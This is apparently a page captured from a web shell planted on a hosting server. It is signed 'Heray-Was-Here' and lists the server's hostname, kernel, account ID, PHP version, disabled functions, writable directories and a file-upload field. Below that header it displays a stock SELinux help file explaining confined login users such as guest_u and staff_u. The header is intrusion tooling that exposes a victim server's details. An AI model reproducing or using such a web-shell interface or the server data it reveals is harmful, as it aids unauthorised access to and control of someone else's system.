Heray-Was-Here
Server : LiteSpeed
System : Linux br-asc-web1845.main-hosting.eu 5.14.0-611.42.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 24 05:30:20 EDT 2026 x86_64
User : u602970434 ( 602970434)
PHP Version : 8.3.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Directory :  /lib/python3.9/site-packages/sepolicy/help/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //lib/python3.9/site-packages/sepolicy/help/login.txt
By Default on a SELinux Targeted Policy system, all users login using the unconfined_t user.


But SELinux has a very powerful concept called confined users.  You can setup individual users on your system to login with different SELinux user types.  This Login Mapping Screen allows you to map a Linux login user to an SELinux User.

Default SELinux Users:

* Terminal user/ssh - guest_u
  - No Network, No setuid, no exec in homedir

* Browser user/kiosk - xguest_u
  - Web access ports only.  No setuid, no exec in homedir

* Full Desktop user - User_u
  - Full Network, No SETUID.

* Confined Admin/Desktop User - Staff_u
  - Full Network, sudo to admin only, no root password.  Usually a confined admin

* Unconfined user - unconfined_u (Default)
  - SELinux does not block access.

Hry